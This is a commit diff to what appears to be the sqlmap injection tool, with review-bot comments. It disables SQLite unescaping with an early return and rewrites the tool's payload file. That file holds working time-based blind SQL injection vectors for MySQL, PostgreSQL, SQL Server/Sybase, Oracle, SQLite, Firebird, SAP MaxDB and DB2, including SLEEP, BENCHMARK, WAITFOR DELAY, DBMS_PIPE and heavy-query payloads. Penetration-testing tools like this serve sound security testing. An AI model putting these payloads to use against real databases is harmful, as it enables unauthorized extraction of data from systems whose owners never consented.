Commit 1928d54

committed
fixes issue #97
1 parent 224bce8 commit 1928d54

2 files changed

Lines changed: 142 additions & 41 deletions


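--- a/plugins/dbms/sqlite/syntax.py
+++ b/plugins/dbms/sqlite/syntax.py
@@ -15,6 +15,8 @@ def __init__(self):
 
 @staticmethod
 def unescape(expression, quote=True):
+return expression
+
 if isDBMSVersionAtLeast('3'):
 if quote:
 expression = expression.replace("'", "''")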
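Review bot: The added `return expression` at the top of `unescape` makes the entire remaining body, starting with the `isDBMSVersionAtLeast('3')` branch, unreachable without saying why, so the next reader cannot tell a deliberate switch-off from a leftover debugging line. If the intent is to disable unescaping for SQLite as part of issue #97, state it on the line, e.g. `return expression  # NOTE: unescaping intentionally disabled for SQLite (issue #97); the code below is unreachable`, or delete the stranded branch instead of keeping it as dead code. The body of unescape continues past the end of the hunk.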

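--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2838,37 +2838,38 @@ Formats:
 
 <!-- Time-based blind tests - Parameter replace -->
 <test>
-<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
+<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>3</where>
-<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
 <request>
-<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
 </response>
 <details>
 <dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.0</dbms_version>
 </details>
 </test>
 
 <test>
-<title>MySQL time-based blind - Parameter replace (ELT)</title>
+<title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
 <stype>5</stype>
 <level>4</level>
-<risk>1</risk>
+<risk>2</risk>
 <clause>1,2,3</clause>
 <where>3</where>
-<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
 <request>
-<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
 </request>
 <response>
-<time>[SLEEPTIME]</time>
+<time>[DELAYED]</time>
 </response>
 <details>
 <dbms>MySQL</dbms>
@@ -2895,59 +2896,77 @@ Formats:
 </test>
 
 <test>
-<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
+<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
 <stype>5</stype>
-<level>3</level>
+<level>5</level>
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>3</where>
-<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
 <request>
-<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
 </response>
 <details>
 <dbms>MySQL</dbms>
-<dbms_version>&gt;= 5.0</dbms_version>
 </details>
 </test>
 
 <test>
-<title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
+<title>MySQL time-based blind - Parameter replace (ELT)</title>
 <stype>5</stype>
-<level>4</level>
-<risk>2</risk>
+<level>5</level>
+<risk>1</risk>
 <clause>1,2,3</clause>
 <where>3</where>
-<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
 <request>
-<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
 </request>
 <response>
-<time>[DELAYED]</time>
+<time>[SLEEPTIME]</time>
 </response>
 <details>
 <dbms>MySQL</dbms>
 </details>
 </test>
 
-<!-- TODO: carry on editing these payloads -->
 <test>
-<title>PostgreSQL time-based blind - Parameter replace (GENERATE_SERIES)</title>
+<title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>
 <stype>5</stype>
 <level>3</level>
-<risk>2</risk>
+<risk>1</risk>
 <clause>1,2,3</clause>
 <where>3</where>
-<vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+<payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
 </response>
+<details>
+<dbms>PostgreSQL</dbms>
+<dbms_version>&gt; 8.1</dbms_version>
+</details>
+</test>
+
+<test>
+<title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+<request>
+<payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
 <details>
 <dbms>PostgreSQL</dbms>
 </details>
@@ -2960,9 +2979,9 @@ Formats:
 <risk>1</risk>
 <clause>1,3</clause>
 <where>3</where>
-<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
 <request>
-<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
@@ -2974,16 +2993,37 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>1,3</clause>
+<where>3</where>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
+<request>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
 <test>
 <title>Oracle time-based blind - Parameter replace</title>
 <stype>5</stype>
 <level>3</level>
 <risk>1</risk>
 <clause>1,3</clause>
 <where>3</where>
-<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
 <request>
-<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
@@ -2994,42 +3034,101 @@ Formats:
 </test>
 
 <test>
-<title>Microsoft Access time-based blind - Parameter replace</title>
+<title>Oracle time-based blind - Parameter replace (heavy queries)</title>
 <stype>5</stype>
-<level>3</level>
-<risk>1</risk>
+<level>4</level>
+<risk>2</risk>
 <clause>1,3</clause>
 <where>3</where>
-<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
 <request>
-<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
 </request>
 <response>
-<time>[SLEEPTIME]</time>
+<time>[DELAYED]</time>
 </response>
 <details>
-<dbms>Microsoft Access</dbms>
+<dbms>Oracle</dbms>
 </details>
 </test>
 
 <test>
-<title>SAP MaxDB time-based blind - Parameter replace</title>
+<title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
 <stype>5</stype>
-<level>3</level>
-<risk>1</risk>
+<level>4</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END))</vector>
+<request>
+<payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>SQLite</dbms>
+<dbms_version>&gt; 2.0</dbms_version>
+</details>
+</test>
+
+<test>
+<title>Firebird time-based blind - Parameter replace (heavy query)</title>
+<stype>5</stype>
+<level>5</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM])</vector>
+<request>
+<payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3)</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>Firebird</dbms>
+<dbms_version>&gt;= 2.0</dbms_version>
+</details>
+</test>
+
+<test>
+<title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
+<stype>5</stype>
+<level>5</level>
+<risk>2</risk>
 <clause>1,3</clause>
 <where>3</where>
-<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
 <request>
-<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+<payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
 </request>
 <response>
-<time>[SLEEPTIME]</time>
+<time>[DELAYED]</time>
 </response>
 <details>
 <dbms>SAP MaxDB</dbms>
 </details>
 </test>
+
+<test>
+<title>IBM DB2 AND time-based blind (heavy query)</title>
+<stype>5</stype>
+<level>5</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+<request>
+<payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>IBM DB2</dbms>
+</details>
+</test>
 <!-- End of time-based blind tests - Parameter replace -->
 
 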
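Review bot: The new IBM DB2 entry in the last hunk is titled `IBM DB2 AND time-based blind (heavy query)` although it sits inside the "Time-based blind tests - Parameter replace" block and carries `<where>3</where>` like every sibling; all other tests in this block are named "... time-based blind - Parameter replace ...", so the "AND" wording reads as if it belonged to the AND/OR section and will misfile the entry for anyone scanning by title. Suggest `<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>`. The same hunk also adds `<dbms_version>` to the SQLite and Firebird heavy-query tests but not to the PostgreSQL, Microsoft SQL Server/Sybase or Oracle ones; if that omission is deliberate, a one-line XML comment on those tests would stop a later editor from "correcting" it.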